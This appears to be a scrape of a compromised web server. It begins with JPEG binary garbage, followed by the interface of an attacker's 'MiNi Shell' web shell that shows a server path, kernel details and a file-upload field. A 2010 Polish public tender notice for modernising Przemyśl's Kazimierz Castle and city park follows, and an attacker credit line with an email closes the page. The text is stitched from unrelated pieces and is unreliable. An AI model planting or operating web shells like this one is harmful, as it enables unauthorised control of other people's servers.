JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100428/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100428/118752-N-2010.html

<p class="kh_header"><b>Przemyśl: Zastępstwo Inwestorskie  przy realizacji zadania pn.: Modernizacja Zamku Kazimierzowskiego wraz z rewitalizacją Parku Miejskiego w Przemyślu .</b><br>
<b>Numer ogłoszenia: 118752 - 2010; data zamieszczenia: 28.04.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Przemyśl - Prezydent Miasta Przemyśl , ul. Rynek 1, 37-700 Przemyśl, woj. podkarpackie, tel. 016 6782962, 6752072, faks 016 6786449.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.przemysl.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zastępstwo Inwestorskie  przy realizacji zadania pn.: Modernizacja Zamku Kazimierzowskiego wraz z rewitalizacją Parku Miejskiego w Przemyślu ..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest pełnienie funkcji  Inwestora Zastępczego nad realizacją  Projektu:  Modernizacja Zamku Kazimierzowskiego wraz z rewitalizacją Parku Miejskiego  współfinansowanego  z Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego Województwa Podkarpackiego na lata 2007-2013 - Os priorytetowa VI Turystyka i kultura .:
Zakres robót budowlanych przewidzianych w Projekcie obejmuje:
A) Modernizacja Zamku Kazimierzowskiego (ETAP I), w tym:
1. Remont Sali Teatru Fredreum, zaplecza oraz sanitariatów wraz z wymianą/wykonaniem
 instalacji wewnętrznych:
- inst. wod.- kan.
- inst. c.o.
- inst. c.t.
- inst. chłodnicza freonowa 
- inst. wody lodowej
- instalacja kotłowni
- inst. wentylacji
- inst. elektryczna
2. Remont murów i baszt ( postępowanie o udzielenie zamówienia publicznego przeprowadzi  Gmina Miejska w Przemyślu- termin zakończenia postępowania  lipiec 2010r.)
3. Remont Sali kominkowej 
4. Wymiana stolarki okiennej i drzwiowej
5. Renowacja dziedzińca zamkowego z wykonaniem  sieci  elektrycznych i oświetlenia terenu
6. Rewaloryzacja wzgórza zamkowego
B) Rewitalizacja Parku Miejskiego, w tym:
1. Modernizacja oświetlenia parkowego
2. Modernizacja alejek parkowych
3. Rewaloryzacja ekosystemu stawowego
4. Budowa i uzupełnienie elementów małej architektury
II. Zakres usługi obejmuje:

A. Działania architektoniczno - projektowe
1) weryfikacja istniejącej dokumentacji projektowej
2) identyfikacja zakresu niezbędnych poprawek i uzupełnień
3) sporządzenie projektów uzupełniających
4) sporządzenie aktualizacji kosztorysów, w tym kosztorysów inwestorskich, niezbędnych w procesie wyboru Wykonawcy.

B. Przygotowanie i przeprowadzenie postępowania na wybór Wykonawcy zgodnie z ustawą Prawo
zamówień publicznych (t.j. Dz. U. z 2007r. Nr 223, poz. 1655 z późn. zm.)
1) przygotowanie w porozumieniu z Zamawiającym, specyfikacji istotnych warunków zamówienia, projektu umowy  wraz ze wszystkimi dokumentami koniecznymi do ogłoszenia postępowania,
2) przeprowadzenie procedury postępowania przy współudziale Zamawiającego ( dwa postępowania : Modernizacja Zamku ,  Rewitalizacja Parku Miejskiego) 
3) analiza złożonych ofert - opracowanie raportu dla Zamawiającego,
C. Czynności koordynacyjno - nadzorcze Inwestora Zastępczego
1) reprezentowanie interesów Zmawiającego wobec wszystkich uczestników Projektu,
2) nadzór inwestorski przy realizacji Projektu nad wszystkimi branżami, zgodnie z przepisami ustawy prawo budowlane i innymi obowiązującymi przepisami,
3) przekazanie Wykonawcy kompletnej dokumentacji oraz terenu budowy,
4) wypełnianie w imieniu Zamawiającego jego obowiązków wynikających z obowiązujących
przepisów, a związanych z realizacją umowy na pełnienie funkcji Inwestora Zastępczego,
5) koordynowanie prac wykonywanych przez różnych wykonawców uczestniczących w Projekcie
6) sprawowanie nadzoru technicznego i finansowego zgodnie z wymogami ustawy Prawo Budowlane, warunkami technicznymi wykonania i odbioru robót ze szczególnym uwzględnieniem kontroli jakości wykonywanych robót,
7) wnioskowanie do zatwierdzenia przez Zamawiającego uzgodnionych z autorem projektu
wszelkich zmian wnoszonych przez realizatorów Projektu oraz sporządzonych przy udziale Zamawiającego protokołów konieczności,
8) w razie potrzeby wzywanie projektanta na budowę, kierowanie do projektanta zastrzeżeń
do projektu, zgłoszonych przez Wykonawcę i dokonywanie z nim stosownych uzgodnień lub
wyjaśnień,
9) nadzór nad zapewnieniem bezpieczeństwa i przestrzegania przepisów p. pożarowych, bezpieczeństwa i higieny pracy, przez wszystkich uczestników procesu realizacji Projektu, 
w rozumieniu wymagań stawianych przez prawo budowlane i inne obowiązujące przepisy, podczas całego procesu realizacji Projektu,
10) koordynacja umów na dostawę energii elektrycznej, wody, itp., niezbędnych do wykonania
Projektu, a także późniejszej eksploatacji,
11) inicjowanie wprowadzania zmian do treści umów zawartych z Wykonawcą przez przygotowywanie stosownych aneksów do tych umów, w związku ze zmianami
warunków określonych w umowach, zawsze przy uwzględnieniu ograniczeń do dokonywania takich zmian
12) prowadzenie biura w miejscu realizacji Projektu wraz z zapewnieniem stałej obecności kompetentnych przedstawicieli Wykonawcy,
13) prowadzenie narad roboczych na terenie budowy Inwestycji oraz kontrola realizacji ustaleń z tych narad,
14) udział w uzyskaniu przez Zamawiającego wszystkich wymaganych przepisami prawa decyzji administracyjnych, opinii, uzgodnień, stanowisk organów administracyjnych po zakończeniu procesu inwestycyjnego i udział w uzyskaniu ostatecznej decyzji o pozwoleniu na użytkowanie obiektu/obiektów lub zawiadomienia właściwego organu o zakończeniu budowy,
15) dokonywanie przy udziale Zamawiającego czynności odbiorów przewidzianych w umowie 
z Wykonawcą.
16) sprawdzanie i zatwierdzanie faktur Wykonawców, a także dokumentów, które będą załącznikami do tych faktur / w tym protokołów odbioru / pod względem merytorycznym oraz rachunkowym,
17) przygotowanie materiałów do odbioru końcowego Budowy, powiadomienie wszystkich
uczestników procesu inwestycyjnego o terminie odbioru końcowego Inwestycji oraz dokonanie odbioru końcowego Inwestycji,
18) akceptowanie w uzgodnieniu z Zamawiającym dostarczonych przez wykonawców próbek materiałów wykończeniowych,
19) występowanie wspólnie z  Zamawiającym  przed organami administracji i przed sądami, 
w sprawach wynikających z realizacji Inwestycji, w granicach udzielonych pełnomocnictw,
20) naliczanie i egzekwowanie w imieniu Zamawiającego kar umownych i/lub odszkodowań
od wykonawców oraz dostawców i niezwłoczne przekazywanie ich Zamawiającemu,
21) archiwizacja korespondencji oraz dokumentacji i przekazanie ich Zamawiającemu w stanie kompletnym po zakończeniu Projektu lub rozwiązaniu Umowy.
D. Obsługa formalno - prawna i ekonomiczno - finansowa
1) opiniowanie prawne dokumentacji związanej z Projektem,
2) rozstrzyganie wątpliwości prawnych dotyczących Projektu,
3) realizacja umów związanych z finansowaniem Projektu,
4) współpraca z Zamawiającym przy składanie wniosków o płatność,
5) aktualizowanie sprawozdań finansowych Projektu w układzie budżet/wykonanie,
6) monitorowanie płynności Projektu.
III. Zakres dokumentacyjny obowiązków
1. opracowanie procedur odbiorowych podlegających zatwierdzeniu przez Zamawiającego
2. sporządzanie świadectw płatności
3. spisywanie notatek z wszelkich narad z zaznaczeniem ustaleń i wykazaniem obecności
4. sporządzanie raportów wycinkowych/problemowych na żądanie podmiotów i instytucji współpracujących raz kontrolnych
5. aktualizowanie harmonogramu realizacji Projektu.
IV Okres gwarancji 
Inwestor Zastępczy zobowiązuje się  do współpracy z Zamawiającym w zakresie przeprowadzania przeglądów gwarancyjnych w okresie obowiązywania gwarancji 
 ( przewidywany okres gwarancji : 5 lat na prace konserwatorskie, 3 lata na roboty budowlane  od daty podpisania protokołu odbioru) 
2. Szczegółowy opis zamówienia na wykonanie robót budowlanych przedstawiono opisie zakresu prac konserwatorskich i robót budowlanych oraz  dokumentacji projektowej ( załącznik nr 1 do SIWZ)  ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.52.00.00-9, 71.24.70.00-1, 71.54.00.00-5, 71.24.80.00-8, 71.53.00.00-2, 71.31.80.00-0, 71.54.00.00-5, 71.31.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> wadium 3000,00 PLN</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli wykonawca wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej jedną   usługę polegającą na sprawowaniu  funkcji inwestora zastępczego lub nadzoru inwestorskiego na zadaniu inwestycyjnym polegającym na przebudowie, modernizacji, remoncie obiektu wpisanego do rejestru zabytków o wartości nie mniejszej niż 3.000.000,00 zł. Zakres rzeczowy zrealizowanej usługi powinien obejmować pełnienie nadzoru nad robotami wielobranżowymi tj. robotami ogólnobudowlanymi, pracami konserwatorskimi, robotami drogowymi i instalacyjnymi (elektrycznymi, wodno-kanalizacyjnymi).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli wykonawca będzie dysponował osobami odpowiednich kwalifikacjach zawodowych, doświadczeniu, uprawnieniach niezbędnych do wykonania zamówienia:
1)	Kierownik Zespołu Inwestora Zastępczego   - powinien posiadać uprawnienia budowlane o specjalności konstrukcyjno-budowlanej bez ograniczeń a także udokumentowane doświadczenie zawodowe do nadzorowania robót budowlanych i prac konserwatorskich na obiektach wpisanych do rejestru zabytków, zgodnie z rozporządzeniem Ministra Kultury z 09.06.2004 (Dz.U. Nr 150, poz.1579)  - udokumentowana 2 letnia praktyka zawodowa na budowie przy zabytkach nieruchomych. Osoba ta powinna również posiadać doświadczenie zawodowe przy nadzorowaniu co najmniej 1 obiektu zabytkowego współfinansowanego ze środków UE o wartości robót nie mniejszej niż 1 mln. zł. 
2)	Inspektor nadzoru robót drogowych - uprawnienia  do  kierowania robotami budowlanymi o specjalności drogowej, 
3)	Inspektor nadzoru robót sanitarnych - uprawnienia do kierowania robotami o specjalności sieci sanitarne, instalacje i urządzenia cieplne, wentylacyjne, gazowe, wodociągowe i kanalizacyjne),
4)	Inspektor nadzoru robót elektrycznych - uprawnienia do kierowania robotami  elektrycznymi o specjalności w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych,
5)	Specjalista ds. akustyki dźwięku , który posiada doświadczenie przy realizacji akustycznej pomieszczenia teatralnego lub kinowego przeznaczonego na pobyt równocześnie 150 osób.
6)	Specjalista ds. techniki scenicznej, który posiada doświadczenie przy realizacji  instalacji technicznych sceny teatralnej lub kinowej w pomieszczeniach przeznaczonych na pobyt równocześnie min. 150 osób,
7)	Inspektor ds. rozliczeń  powinna posiadać udokumentowane doświadczenie zawodowe przy obsłudze co najmniej 1 inwestycji o wartości robót nie mniejszej niż 1 mlm. zł. współfinansowanej ze środków UE 
8)	Inspektor ds. zamówień publicznych powinna posiadać udokumentowane doświadczenie zawodowe przy obsłudze co najmniej 1 inwestycji o wartości robót nie mniejszej niż 1 mlm. zł. współfinansowanej ze środków UE</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli wykonawca wykaże, że jest ubezpieczony od odpowiedzialności cywilnej z tytułu prowadzonej działalności gospodarczej i posiada opłaconą polisę, a w przypadku jej braku inny dokument ubezpieczenia OC  na kwotę ubezpieczenia min. 200 000,00  zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) wypełniony i podpisany przez osoby upoważnione do reprezentowania Wykonawcy Formularz oferty według wzoru stanowiącego załącznik Nr 2 do SIWZ 
2) pełnomocnictwo osób podpisujących ofertę do podejmowania zobowiązań w imieniu firmy składającej ofertę o ile osoba reprezentująca wykonawcę w postępowaniu o udzielenie zamówienia nie jest wskazana jako upoważniona do jej reprezentacji we właściwym rejestrze.
3) pełnomocnictwo o którym mowa w pkt. 5.1. 
4) dowód wpłaty wadium</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający na podstawie art. 144 ust. 1 ustawy Prawo zamówień publicznych, przewiduje możliwość zmiany zawartej umowy w następujących przypadkach:
a)	zmiany osób wyznaczonych do pełnienia funkcji, jak też powołania nowych.
b)	w razie uzyskania w przetargach na wykonanie robót budowlanych ceny niższej  niż wartość szacunkowa zamówienia na roboty budowlane (Rozdz. 1 pkt.4 SIWZ) , wynagrodzenie  należne  wykonawcy ulegnie odpowiednio przeliczeniu i dostosowaniu do procentowej (określonej w ofercie wybranego wykonawcy)   wartości robót budowlanych netto.
W przypadku zwiększenia wartości robót w wyniku zmian (roboty i  zamówienia dodatkowe), wynagrodzenie nie ulegnie zwiększeniu;
c)	w przypadku niezawinionego przez Wykonawcę  przesunięcia (wydłużenia) harmonogramu czasowego i ostatecznego zakończenia robót objętych usługą, wydłużeniu ulec może termin realizacji usługi objętej przedmiotem zamówienia,</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.przemysl.pl BIP zamówienia publiczne usługi<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wieloosobowe Stanowisko ds. Zamówień Publicznych  Urząd Miejski w Przemyślu ul. Ratuszowa 10A  37-700 Przemyśl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.05.2010 godzina 10:00, miejsce: Wieloosobowe Stanowisko ds. Zamówień Publicznych  Urząd Miejski w Przemyślu ul. Ratuszowa 10A  37-700 Przemyśl.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Europejski Fundusz Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego Województwa Podkarpackiego na lata 2007-2013 - Oś priorytetowa VI Turystyka i kultura .:.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com